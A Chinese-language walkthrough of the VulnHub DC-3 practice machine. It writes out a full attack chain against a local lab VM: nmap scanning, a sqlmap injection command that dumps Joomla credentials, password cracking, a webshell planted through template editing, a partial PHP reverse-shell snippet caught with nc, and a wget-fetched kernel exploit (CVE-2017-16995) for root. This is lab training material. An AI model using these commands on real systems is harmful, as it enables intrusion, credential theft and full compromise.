vulnhub系列 DC3靶机

闲扯

做的时候千难万险的，啥poc都试一遍，思路也有了，就是没那技术， 写出来的记录跟答案一样，少了很多弯路，不过有时候尝试了好几个，上十个失败poc，不可能都记录下来吧。（队友说网上的文章都跟答案一样，有感而发）

安装同DC2，如果出现打开报错，什么网卡e0:1错误的话，就在设置里，点击CD/DVD的高级，把这里改成它要求的网卡：

开始

第一步扫描内网ip，找到靶机
arp-scan -l

然后扫描端口，扫描目录，常规操作：
nmap -sS -v -p- -Pn -A 192.168.146.133

发现开了80，用了joomla

访问之，没找到版本，直接开干

尝试了msf里面，从2015年-2020年的所有洞，没有一个成功的：
search joomla date:2016

然后手动找poc，发现了这个注入，但是这个注入在msf里面也是有的，没打成功简直迷惑行为
sqlmap -u http://192.168.146.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1 -D 'joomladb' --dbms mysql -T '#__users' -C 'username,password' --dump -p list[fullordering]

找到了账号密码，这里不能对它进行修改，只能尝试解密了：

平常解密都是丢群里让大佬帮忙跑- -自己弄很少见，其他工具也是要字典的，懒得弄了：
johm /root/pwd --wordlist=/usr/share/john/password.lst

解出来后从后台登陆上去（一开始dirsearch扫到了这个目录），然后百度 joomla后台拿shell,进入templates：

随便进一个：


这里是可以直接编辑php文件的，测试写入一句话：

这个大标题是路径：

访问之：

尝试监听，反弹shell，无果，最后发现和msf有关系，也和反弹马有关系：

要使用这个马，用其他的马session会直接死掉，而且msf接收老半天接不到这个马，要用nc，不是很清楚为啥，马没多大区别，应该是msf的问题：

$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('sh',$descriptorspec,$pipes);
proc_close($process);

收到反弹shell：
nc -lvvp 2333

查看内核，尝试提权：
uname -a
cat /etc/*-release

searchsploit搜索一波：
searchsploit ubuntu 16.04

中间有三个对应的上的，一个一个打开看：

这时候要把提权文件上传到目标机器，可以连菜刀，也可以自己写个上传文件，也可以用python在本机开个http：
python3 -m http.server 80

先下个40871试试：
wget http://192.168.146.128/40871.c

编译运行，极其失败，好几个都是代码有问题：

下载39772（CVE-2017-16995）试试，在39772的poc里面有写地址，不过要才能下：（https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip）

解压：
unzip 39772.zip

靶机下载：
wget http://192.168.146.128/exploit.tar

解压执行：
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit

./compile.sh
./doubleput

等一会之后发现变成了root：（关于这个cve的分析网上也不少）

提权后的flag一般就在root目录下：

总结

忘记啥时候做的了- -草稿里翻出来的。